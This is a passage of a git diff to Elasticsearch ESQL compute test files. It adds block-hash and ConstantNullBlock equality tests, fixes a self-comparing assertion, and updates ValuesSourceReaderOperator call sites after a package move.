builder.append("#"); + builder.append(BytesRefs.toString(block1.getBytesRef(i, scratch))); + distinctKeys.add(builder.toString()); + } + assertThat(distinctKeys.size(), equalTo(totalPositions)); + } finally { + Releasables.close(keys); + } + } finally { + Releasables.close(output); + page.releaseBlocks(); + } + } + + public void test2BytesRefs() { + final Page page; + final int positions = randomIntBetween(1, 1000); + final boolean generateVector = randomBoolean(); + try ( + BytesRefBlock.Builder builder1 = blockFactory.newBytesRefBlockBuilder(positions); + BytesRefBlock.Builder builder2 = blockFactory.newBytesRefBlockBuilder(positions); + ) { + List builders = List.of(builder1, builder2); + for (int p = 0; p < positions; p++) { + for (BytesRefBlock.Builder builder : builders) { + int valueCount = generateVector ? 1 : between(0, 3); + switch (valueCount) { + case 0 -> builder.appendNull(); + case 1 -> builder.appendBytesRef(new BytesRef(Integer.toString(between(1, 100)))); + default -> { + builder.beginPositionEntry(); + for (int v = 0; v < valueCount; v++) { + builder.appendBytesRef(new BytesRef(Integer.toString(between(1, 100)))); + } + builder.endPositionEntry(); + } + } + } + } + page = new Page(builder1.build(), builder2.build()); + } + final int emitBatchSize = between(positions, 10 * 1024); + var groupSpecs = List.of(new BlockHash.GroupSpec(0, ElementType.BYTES_REF), new BlockHash.GroupSpec(1, ElementType.BYTES_REF)); + record Output(int offset, IntBlock block, IntVector vector) implements Releasable { + @Override + public void close() { + Releasables.close(block, vector); + } + } + List output1 = new ArrayList<>(); + List output2 = new ArrayList<>(); + try ( + BlockHash hash1 = new BytesRef2BlockHash(blockFactory, 0, 1, emitBatchSize); + BlockHash hash2 = new PackedValuesBlockHash(groupSpecs, blockFactory, emitBatchSize) + ) { + hash1.add(page, new GroupingAggregatorFunction.AddInput() { + @Override + public void add(int positionOffset, IntArrayBlock groupIds) { + groupIds.incRef(); + output1.add(new Output(positionOffset, groupIds, null)); + } + + @Override + public void add(int positionOffset, IntBigArrayBlock groupIds) { + groupIds.incRef(); + output1.add(new Output(positionOffset, groupIds, null)); + } + + @Override + public void add(int positionOffset, IntVector groupIds) { + groupIds.incRef(); + output1.add(new Output(positionOffset, null, groupIds)); + } + + @Override + public void close() { + fail("hashes should not close AddInput"); + } + }); + hash2.add(page, new GroupingAggregatorFunction.AddInput() { + @Override + public void add(int positionOffset, IntArrayBlock groupIds) { + groupIds.incRef(); + output2.add(new Output(positionOffset, groupIds, null)); + } + + @Override + public void add(int positionOffset, IntBigArrayBlock groupIds) { + groupIds.incRef(); + output2.add(new Output(positionOffset, groupIds, null)); + } + + @Override + public void add(int positionOffset, IntVector groupIds) { + groupIds.incRef(); + output2.add(new Output(positionOffset, null, groupIds)); + } + + @Override + public void close() { + fail("hashes should not close AddInput"); + } + }); + assertThat(output1.size(), equalTo(output2.size())); + for (int i = 0; i < output1.size(); i++) { + Output o1 = output1.get(i); + Output o2 = output2.get(i); + assertThat(o1.offset, equalTo(o2.offset)); + if (o1.vector != null) { + assertNull(o1.block); + assertThat(o1.vector, equalTo(o2.vector != null ? o2.vector : o2.block.asVector())); + } else { + assertNull(o2.vector); + assertThat(o1.block, equalTo(o2.block)); + } + } + } finally { + Releasables.close(output1); + Releasables.close(output2); + page.releaseBlocks(); + } + } + public void test3BytesRefs() { final Page page; final int positions = randomIntBetween(1, 1000); @@ -1326,7 +1517,7 @@ public void close() { fail("hashes should not close AddInput"); } }); - assertThat(output1.size(), equalTo(output1.size())); + assertThat(output1.size(), equalTo(output2.size())); for (int i = 0; i < output1.size(); i++) { Output o1 = output1.get(i); Output o2 = output2.get(i); diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/AggregateMetricDoubleBlockEqualityTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/AggregateMetricDoubleBlockEqualityTests.java new file mode 100644 index 0000000000000..1a31ca07e546c --- /dev/null +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/AggregateMetricDoubleBlockEqualityTests.java @@ -0,0 +1,89 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.compute.data; + +import org.elasticsearch.compute.test.ComputeTestCase; +import org.elasticsearch.compute.test.TestBlockFactory; +import org.elasticsearch.core.Releasables; + +import java.util.List; + +public class AggregateMetricDoubleBlockEqualityTests extends ComputeTestCase { + + static final BlockFactory blockFactory = TestBlockFactory.getNonBreakingInstance(); + + // TODO: Add additional tests + + public void testEmptyBlock() { + // all these "empty" blocks should be equivalent + var partialMetricBuilder = blockFactory.newAggregateMetricDoubleBlockBuilder(0); + for (var subBuilder : List.of( + partialMetricBuilder.min(), + partialMetricBuilder.max(), + partialMetricBuilder.sum(), + partialMetricBuilder.count() + )) { + if (randomBoolean()) { + subBuilder.appendNull(); + } else { + if (subBuilder instanceof DoubleBlockBuilder doubleBlockBuilder) { + doubleBlockBuilder.appendDouble(0.0); + } else if (subBuilder instanceof IntBlockBuilder intBlockBuilder) { + intBlockBuilder.appendInt(0); + } + } + } + + List blocks = List.of( + blockFactory.newAggregateMetricDoubleBlockBuilder(0).build(), + blockFactory.newAggregateMetricDoubleBlockBuilder(0).appendNull().build().filter(), + partialMetricBuilder.build().filter(), + blockFactory.newConstantAggregateMetricDoubleBlock( + new AggregateMetricDoubleBlockBuilder.AggregateMetricDoubleLiteral(0.0, 0.0, 0.0, 0), + 0 + ).filter(), + (ConstantNullBlock) blockFactory.newConstantNullBlock(0) + ); + + assertAllEquals(blocks); + Releasables.close(blocks); + } + + public void testSimpleBlockWithManyNulls() { + int positions = randomIntBetween(1, 256); + boolean grow = randomBoolean(); + AggregateMetricDoubleBlockBuilder builder1 = blockFactory.newAggregateMetricDoubleBlockBuilder(grow ? 0 : positions); + AggregateMetricDoubleBlockBuilder builder2 = blockFactory.newAggregateMetricDoubleBlockBuilder(grow ? 0 : positions); + ConstantNullBlock.Builder builder3 = new ConstantNullBlock.Builder(blockFactory); + for (int p = 0; p < positions; p++) { + builder1.appendNull(); + builder2.appendNull(); + builder3.appendNull(); + } + AggregateMetricDoubleBlock block1 = builder1.build(); + AggregateMetricDoubleBlock block2 = builder2.build(); + Block block3 = builder3.build(); + assertEquals(positions, block1.getPositionCount()); + assertTrue(block1.mayHaveNulls()); + assertTrue(block1.isNull(0)); + + List blocks = List.of(block1, block2, block3); + assertAllEquals(blocks); + } + + static void assertAllEquals(List objs) { + for (Object obj1 : objs) { + for (Object obj2 : objs) { + assertEquals(obj1, obj2); + assertEquals(obj2, obj1); + // equal objects must generate the same hash code + assertEquals(obj1.hashCode(), obj2.hashCode()); + } + } + } +} diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/BooleanBlockEqualityTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/BooleanBlockEqualityTests.java index 7c0c4c48e97de..6bb31b141597f 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/BooleanBlockEqualityTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/BooleanBlockEqualityTests.java @@ -52,7 +52,8 @@ public void testEmptyBlock() { blockFactory.newConstantBooleanBlockWith(randomBoolean(), 0), blockFactory.newBooleanBlockBuilder(0).build(), blockFactory.newBooleanBlockBuilder(0).appendBoolean(randomBoolean()).build().filter(), - blockFactory.newBooleanBlockBuilder(0).appendNull().build().filter() + blockFactory.newBooleanBlockBuilder(0).appendNull().build().filter(), + (ConstantNullBlock) blockFactory.newConstantNullBlock(0) ); assertAllEquals(blocks); } @@ -252,6 +253,28 @@ public void testBlockInequality() { assertAllNotEquals(notEqualBlocks); } + public void testSimpleBlockWithManyNulls() { + int positions = randomIntBetween(1, 256); + boolean grow = randomBoolean(); + BooleanBlock.Builder builder1 = blockFactory.newBooleanBlockBuilder(grow ? 0 : positions); + BooleanBlock.Builder builder2 = blockFactory.newBooleanBlockBuilder(grow ? 0 : positions); + ConstantNullBlock.Builder builder3 = new ConstantNullBlock.Builder(blockFactory); + for (int p = 0; p < positions; p++) { + builder1.appendNull(); + builder2.appendNull(); + builder3.appendNull(); + } + BooleanBlock block1 = builder1.build(); + BooleanBlock block2 = builder2.build(); + Block block3 = builder3.build(); + assertEquals(positions, block1.getPositionCount()); + assertTrue(block1.mayHaveNulls()); + assertTrue(block1.isNull(0)); + + List blocks = List.of(block1, block2, block3); + assertAllEquals(blocks); + } + static void assertAllEquals(List objs) { for (Object obj1 : objs) { for (Object obj2 : objs) { diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/BytesRefBlockEqualityTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/BytesRefBlockEqualityTests.java index ddf8b1a28bc26..5a81c3b4f0a8e 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/BytesRefBlockEqualityTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/BytesRefBlockEqualityTests.java @@ -63,7 +63,8 @@ public void testEmptyBlock() { blockFactory.newConstantBytesRefBlockWith(new BytesRef(), 0), blockFactory.newBytesRefBlockBuilder(0).build(), blockFactory.newBytesRefBlockBuilder(0).appendBytesRef(new BytesRef()).build().filter(), - blockFactory.newBytesRefBlockBuilder(0).appendNull().build().filter() + blockFactory.newBytesRefBlockBuilder(0).appendNull().build().filter(), + (ConstantNullBlock) blockFactory.newConstantNullBlock(0) ); assertAllEquals(blocks); } @@ -357,17 +358,20 @@ public void testSimpleBlockWithManyNulls() { boolean grow = randomBoolean(); BytesRefBlock.Builder builder1 = blockFactory.newBytesRefBlockBuilder(grow ? 0 : positions); BytesRefBlock.Builder builder2 = blockFactory.newBytesRefBlockBuilder(grow ? 0 : positions); + ConstantNullBlock.Builder builder3 = new ConstantNullBlock.Builder(blockFactory); for (int p = 0; p < positions; p++) { builder1.appendNull(); builder2.appendNull(); + builder3.appendNull(); } BytesRefBlock block1 = builder1.build(); BytesRefBlock block2 = builder2.build(); + Block block3 = builder3.build(); assertEquals(positions, block1.getPositionCount()); assertTrue(block1.mayHaveNulls()); assertTrue(block1.isNull(0)); - List blocks = List.of(block1, block2); + List blocks = List.of(block1, block2, block3); assertAllEquals(blocks); } diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/DoubleBlockEqualityTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/DoubleBlockEqualityTests.java index 0bdcd8a29add9..0882c57e538a6 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/DoubleBlockEqualityTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/DoubleBlockEqualityTests.java @@ -51,7 +51,8 @@ public void testEmptyBlock() { blockFactory.newConstantDoubleBlockWith(0, 0), blockFactory.newDoubleBlockBuilder(0).build(), blockFactory.newDoubleBlockBuilder(0).appendDouble(1).build().filter(), - blockFactory.newDoubleBlockBuilder(0).appendNull().build().filter() + blockFactory.newDoubleBlockBuilder(0).appendNull().build().filter(), + (ConstantNullBlock) blockFactory.newConstantNullBlock(0) ); assertAllEquals(blocks); Releasables.close(blocks); @@ -234,17 +235,20 @@ public void testSimpleBlockWithManyNulls() { boolean grow = randomBoolean(); DoubleBlock.Builder builder1 = blockFactory.newDoubleBlockBuilder(grow ? 0 : positions); DoubleBlock.Builder builder2 = blockFactory.newDoubleBlockBuilder(grow ? 0 : positions); + ConstantNullBlock.Builder builder3 = new ConstantNullBlock.Builder(blockFactory); for (int p = 0; p < positions; p++) { builder1.appendNull(); builder2.appendNull(); + builder3.appendNull(); } DoubleBlock block1 = builder1.build(); DoubleBlock block2 = builder2.build(); + Block block3 = builder3.build(); assertEquals(positions, block1.getPositionCount()); assertTrue(block1.mayHaveNulls()); assertTrue(block1.isNull(0)); - List blocks = List.of(block1, block2); + List blocks = List.of(block1, block2, block3); assertAllEquals(blocks); } diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/FloatBlockEqualityTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/FloatBlockEqualityTests.java index 046567ff5987d..e63597d7ff4b0 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/FloatBlockEqualityTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/FloatBlockEqualityTests.java @@ -51,7 +51,8 @@ public void testEmptyBlock() { blockFactory.newConstantFloatBlockWith(0, 0), blockFactory.newFloatBlockBuilder(0).build(), blockFactory.newFloatBlockBuilder(0).appendFloat(1).build().filter(), - blockFactory.newFloatBlockBuilder(0).appendNull().build().filter() + blockFactory.newFloatBlockBuilder(0).appendNull().build().filter(), + (ConstantNullBlock) blockFactory.newConstantNullBlock(0) ); assertAllEquals(blocks); Releasables.close(blocks); @@ -234,17 +235,20 @@ public void testSimpleBlockWithManyNulls() { boolean grow = randomBoolean(); FloatBlock.Builder builder1 = blockFactory.newFloatBlockBuilder(grow ? 0 : positions); FloatBlock.Builder builder2 = blockFactory.newFloatBlockBuilder(grow ? 0 : positions); + ConstantNullBlock.Builder builder3 = new ConstantNullBlock.Builder(blockFactory); for (int p = 0; p < positions; p++) { builder1.appendNull(); builder2.appendNull(); + builder3.appendNull(); } FloatBlock block1 = builder1.build(); FloatBlock block2 = builder2.build(); + Block block3 = builder3.build(); assertEquals(positions, block1.getPositionCount()); assertTrue(block1.mayHaveNulls()); assertTrue(block1.isNull(0)); - List blocks = List.of(block1, block2); + List blocks = List.of(block1, block2, block3); assertAllEquals(blocks); } diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/IntBlockEqualityTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/IntBlockEqualityTests.java index eb68bdf7a59d6..7e6a53054277d 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/IntBlockEqualityTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/IntBlockEqualityTests.java @@ -50,7 +50,8 @@ public void testEmptyBlock() { blockFactory.newConstantIntBlockWith(0, 0), blockFactory.newIntBlockBuilder(0).build(), blockFactory.newIntBlockBuilder(0).appendInt(1).build().filter(), - blockFactory.newIntBlockBuilder(0).appendNull().build().filter() + blockFactory.newIntBlockBuilder(0).appendNull().build().filter(), + (ConstantNullBlock) blockFactory.newConstantNullBlock(0) ); assertAllEquals(blocks); } @@ -203,17 +204,20 @@ public void testSimpleBlockWithManyNulls() { boolean grow = randomBoolean(); IntBlock.Builder builder1 = blockFactory.newIntBlockBuilder(grow ? 0 : positions); IntBlock.Builder builder2 = blockFactory.newIntBlockBuilder(grow ? 0 : positions); + ConstantNullBlock.Builder builder3 = new ConstantNullBlock.Builder(blockFactory); for (int p = 0; p < positions; p++) { builder1.appendNull(); builder2.appendNull(); + builder3.appendNull(); } IntBlock block1 = builder1.build(); IntBlock block2 = builder2.build(); + Block block3 = builder3.build(); assertEquals(positions, block1.getPositionCount()); assertTrue(block1.mayHaveNulls()); assertTrue(block1.isNull(0)); - List blocks = List.of(block1, block2); + List blocks = List.of(block1, block2, block3); assertAllEquals(blocks); } diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/LongBlockEqualityTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/LongBlockEqualityTests.java index 6d6a832d27e54..6dc21a56ad27f 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/LongBlockEqualityTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/data/LongBlockEqualityTests.java @@ -50,7 +50,8 @@ public void testEmptyBlock() { blockFactory.newConstantLongBlockWith(0, 0), blockFactory.newLongBlockBuilder(0).build(), blockFactory.newLongBlockBuilder(0).appendLong(1).build().filter(), - blockFactory.newLongBlockBuilder(0).appendNull().build().filter() + blockFactory.newLongBlockBuilder(0).appendNull().build().filter(), + (ConstantNullBlock) blockFactory.newConstantNullBlock(0) ); assertAllEquals(blocks); } @@ -201,17 +202,20 @@ public void testSimpleBlockWithManyNulls() { boolean grow = randomBoolean(); LongBlock.Builder builder1 = blockFactory.newLongBlockBuilder(grow ? 0 : positions); LongBlock.Builder builder2 = blockFactory.newLongBlockBuilder(grow ? 0 : positions); + ConstantNullBlock.Builder builder3 = new ConstantNullBlock.Builder(blockFactory); for (int p = 0; p < positions; p++) { builder1.appendNull(); builder2.appendNull(); + builder3.appendNull(); } LongBlock block1 = builder1.build(); LongBlock block2 = builder2.build(); + Block block3 = builder3.build(); assertEquals(positions, block1.getPositionCount()); assertTrue(block1.mayHaveNulls()); assertTrue(block1.isNull(0)); - List blocks = List.of(block1, block2); + List blocks = List.of(block1, block2, block3); assertAllEquals(blocks); } diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneQueryEvaluatorTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneQueryEvaluatorTests.java index 4828f70e51dcd..25dd9fc160ec7 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneQueryEvaluatorTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneQueryEvaluatorTests.java @@ -23,6 +23,7 @@ import org.apache.lucene.tests.index.RandomIndexWriter; import org.apache.lucene.tests.store.BaseDirectoryWrapper; import org.apache.lucene.util.BytesRef; +import org.elasticsearch.common.unit.ByteSizeValue; import org.elasticsearch.compute.OperatorTests; import org.elasticsearch.compute.data.BlockFactory; import org.elasticsearch.compute.data.BytesRefBlock; @@ -32,6 +33,7 @@ import org.elasticsearch.compute.data.ElementType; import org.elasticsearch.compute.data.Page; import org.elasticsearch.compute.data.Vector; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperator; import org.elasticsearch.compute.operator.Driver; import org.elasticsearch.compute.operator.DriverContext; import org.elasticsearch.compute.operator.Operator; @@ -200,6 +202,7 @@ private List runQuery(Set values, Query query, boolean shuffleDocs operators.add( new ValuesSourceReaderOperator( blockFactory, + ByteSizeValue.ofGb(1).getBytes(), List.of( new ValuesSourceReaderOperator.FieldInfo( FIELD, @@ -215,7 +218,7 @@ private List runQuery(Set values, Query query, boolean shuffleDocs ); LuceneQueryEvaluator.ShardConfig[] shards = new LuceneQueryEvaluator.ShardConfig[] { new LuceneQueryEvaluator.ShardConfig(searcher.rewrite(query), searcher) }; - operators.add(createOperator(blockFactory, shards)); + operators.add(createOperator(driverContext, shards)); List results = new ArrayList<>(); Driver driver = TestDriverFactory.create( driverContext, @@ -294,7 +297,7 @@ private static LuceneOperator.Factory luceneOperatorFactory(IndexReader reader, /** * Create the operator to test */ - protected abstract Operator createOperator(BlockFactory blockFactory, LuceneQueryEvaluator.ShardConfig[] shards); + protected abstract Operator createOperator(DriverContext driverContext, LuceneQueryEvaluator.ShardConfig[] shards); /** * Should the test use scoring? diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneQueryExpressionEvaluatorTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneQueryExpressionEvaluatorTests.java index ba9e62abb8b35..a6e4840531404 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneQueryExpressionEvaluatorTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneQueryExpressionEvaluatorTests.java @@ -8,10 +8,10 @@ package org.elasticsearch.compute.lucene; import org.apache.lucene.search.Scorable; -import org.elasticsearch.compute.data.BlockFactory; import org.elasticsearch.compute.data.BooleanVector; import org.elasticsearch.compute.data.Page; import org.elasticsearch.compute.lucene.LuceneQueryEvaluator.DenseCollector; +import org.elasticsearch.compute.operator.DriverContext; import org.elasticsearch.compute.operator.EvalOperator; import org.elasticsearch.compute.operator.Operator; @@ -38,8 +38,8 @@ protected Scorable getScorer() { } @Override - protected Operator createOperator(BlockFactory blockFactory, LuceneQueryEvaluator.ShardConfig[] shards) { - return new EvalOperator(blockFactory, new LuceneQueryExpressionEvaluator(blockFactory, shards)); + protected Operator createOperator(DriverContext ctx, LuceneQueryEvaluator.ShardConfig[] shards) { + return new EvalOperator(ctx, new LuceneQueryExpressionEvaluator(ctx.blockFactory(), shards)); } @Override diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneQueryScoreEvaluatorTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneQueryScoreEvaluatorTests.java index 53fa3f775386c..1a460f3d26542 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneQueryScoreEvaluatorTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneQueryScoreEvaluatorTests.java @@ -8,9 +8,9 @@ package org.elasticsearch.compute.lucene; import org.apache.lucene.search.Scorable; -import org.elasticsearch.compute.data.BlockFactory; import org.elasticsearch.compute.data.DoubleVector; import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; import org.elasticsearch.compute.operator.Operator; import org.elasticsearch.compute.operator.ScoreOperator; @@ -47,8 +47,8 @@ public float score() throws IOException { } @Override - protected Operator createOperator(BlockFactory blockFactory, LuceneQueryEvaluator.ShardConfig[] shards) { - return new ScoreOperator(blockFactory, new LuceneQueryScoreEvaluator(blockFactory, shards), 1); + protected Operator createOperator(DriverContext ctx, LuceneQueryEvaluator.ShardConfig[] shards) { + return new ScoreOperator(ctx.blockFactory(), new LuceneQueryScoreEvaluator(ctx.blockFactory(), shards), 1); } @Override diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneSourceOperatorTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneSourceOperatorTests.java index a8cb202f2be2c..91b8de1a08573 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneSourceOperatorTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneSourceOperatorTests.java @@ -24,6 +24,7 @@ import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperatorTests; import org.elasticsearch.compute.operator.Driver; import org.elasticsearch.compute.operator.DriverContext; import org.elasticsearch.compute.operator.Operator; diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneTopNSourceOperatorScoringTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneTopNSourceOperatorScoringTests.java index db60d3cd19cb3..7ba1f9790ecbe 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneTopNSourceOperatorScoringTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneTopNSourceOperatorScoringTests.java @@ -21,6 +21,7 @@ import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.ElementType; import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperatorTests; import org.elasticsearch.compute.operator.DriverContext; import org.elasticsearch.compute.operator.Operator; import org.elasticsearch.compute.test.OperatorTestCase; @@ -52,7 +53,7 @@ public class LuceneTopNSourceOperatorScoringTests extends LuceneTopNSourceOperat private IndexReader reader; @After - private void closeIndex() throws IOException { + public void closeScoringIndex() throws IOException { IOUtils.close(reader, directory); } diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneTopNSourceOperatorTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneTopNSourceOperatorTests.java index 0c9bf676e0547..26540caee0b1f 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneTopNSourceOperatorTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/LuceneTopNSourceOperatorTests.java @@ -24,6 +24,7 @@ import org.elasticsearch.compute.data.ElementType; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperatorTests; import org.elasticsearch.compute.operator.DriverContext; import org.elasticsearch.compute.operator.Operator; import org.elasticsearch.compute.test.AnyOperatorTestCase; @@ -57,7 +58,7 @@ public class LuceneTopNSourceOperatorTests extends AnyOperatorTestCase { private IndexReader reader; @After - private void closeIndex() throws IOException { + public void closeIndex() throws IOException { IOUtils.close(reader, directory); } diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/TimeSeriesSourceOperatorTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/TimeSeriesSourceOperatorTests.java index 15ae1d506a2fe..3a3fac1afc595 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/TimeSeriesSourceOperatorTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/TimeSeriesSourceOperatorTests.java @@ -34,6 +34,9 @@ import org.elasticsearch.compute.data.ElementType; import org.elasticsearch.compute.data.LongVector; import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.lucene.read.TimeSeriesExtractFieldOperator; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperator; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperatorTests; import org.elasticsearch.compute.operator.Driver; import org.elasticsearch.compute.operator.DriverContext; import org.elasticsearch.compute.operator.DriverStatus; diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/ValueSourceReaderTypeConversionTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/read/ValueSourceReaderTypeConversionTests.java similarity index 97% rename from x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/ValueSourceReaderTypeConversionTests.java rename to x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/read/ValueSourceReaderTypeConversionTests.java index 88211a9170034..41941c718bb0e 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/ValueSourceReaderTypeConversionTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/lucene/read/ValueSourceReaderTypeConversionTests.java @@ -5,7 +5,7 @@ * 2.0. */ -package org.elasticsearch.compute.lucene; +package org.elasticsearch.compute.lucene.read; import org.apache.lucene.document.Document; import org.apache.lucene.document.DoubleDocValuesField; @@ -34,6 +34,7 @@ import org.elasticsearch.common.collect.Iterators; import org.elasticsearch.common.lucene.Lucene; import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.common.unit.ByteSizeValue; import org.elasticsearch.common.util.BigArrays; import org.elasticsearch.common.util.concurrent.EsExecutors; import org.elasticsearch.compute.data.Block; @@ -48,6 +49,12 @@ import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.lucene.DataPartitioning; +import org.elasticsearch.compute.lucene.LuceneOperator; +import org.elasticsearch.compute.lucene.LuceneSliceQueue; +import org.elasticsearch.compute.lucene.LuceneSourceOperator; +import org.elasticsearch.compute.lucene.LuceneSourceOperatorTests; +import org.elasticsearch.compute.lucene.ShardContext; import org.elasticsearch.compute.operator.Driver; import org.elasticsearch.compute.operator.DriverContext; import org.elasticsearch.compute.operator.DriverRunner; @@ -234,12 +241,17 @@ private static Operator.OperatorFactory factory( ElementType elementType, BlockLoader loader ) { - return new ValuesSourceReaderOperator.Factory(List.of(new ValuesSourceReaderOperator.FieldInfo(name, elementType, shardIdx -> { - if (shardIdx < 0 || shardIdx >= INDICES.size()) { - fail("unexpected shardIdx [" + shardIdx + "]"); - } - return loader; - })), shardContexts, 0); + return new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), + List.of(new ValuesSourceReaderOperator.FieldInfo(name, elementType, shardIdx -> { + if (shardIdx < 0 || shardIdx >= INDICES.size()) { + fail("unexpected shardIdx [" + shardIdx + "]"); + } + return loader; + })), + shardContexts, + 0 + ); } protected SourceOperator simpleInput(DriverContext context, int size) { @@ -486,6 +498,7 @@ public void testManySingleDocPages() { // TODO: Add index2 operators.add( new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), List.of(testCase.info, fieldInfo(mapperService(indexKey).fieldType("key"), ElementType.INT)), shardContexts, 0 @@ -593,6 +606,7 @@ private void loadSimpleAndAssert( List operators = new ArrayList<>(); operators.add( new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), List.of( fieldInfo(mapperService("index1").fieldType("key"), ElementType.INT), fieldInfo(mapperService("index1").fieldType("indexKey"), ElementType.BYTES_REF) @@ -607,7 +621,9 @@ private void loadSimpleAndAssert( cases.removeAll(b); tests.addAll(b); operators.add( - new ValuesSourceReaderOperator.Factory(b.stream().map(i -> i.info).toList(), shardContexts, 0).get(driverContext) + new ValuesSourceReaderOperator.Factory(ByteSizeValue.ofGb(1), b.stream().map(i -> i.info).toList(), shardContexts, 0).get( + driverContext + ) ); } List results = drive(operators, input.iterator(), driverContext); @@ -629,7 +645,9 @@ private void loadSimpleAndAssert( } } for (Operator op : operators) { - assertThat(((ValuesSourceReaderOperator) op).status().pagesProcessed(), equalTo(input.size())); + 